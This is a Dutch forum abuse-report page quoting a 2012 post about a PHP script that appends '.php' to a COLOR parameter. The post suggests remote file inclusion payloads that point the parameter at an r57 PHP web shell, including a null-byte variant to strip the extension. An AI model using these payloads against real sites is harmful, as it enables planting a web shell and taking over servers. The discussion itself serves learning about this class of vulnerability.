Abuse Melding

Je hebt een klacht over de onderstaande posting:

04-09-2012, 16:00 door regenpijp

Dat script zegt sowieso, $color + .php, dus moet je sowieso uitkijken met je extensies, aangezien achter iedere invoer .php wordt toegevoegd. Ik zou wat proberen als ?COLOR=http://127.0.0.1/r57 waar je r57 (php) script r57 heet zonder extensie of wat met een null-byte in de vorm van ?COLOR=http://127.0.0.1/r57.php%00, waar je script wel r57.php heet.

Beschrijf je klacht (Optioneel):

captcha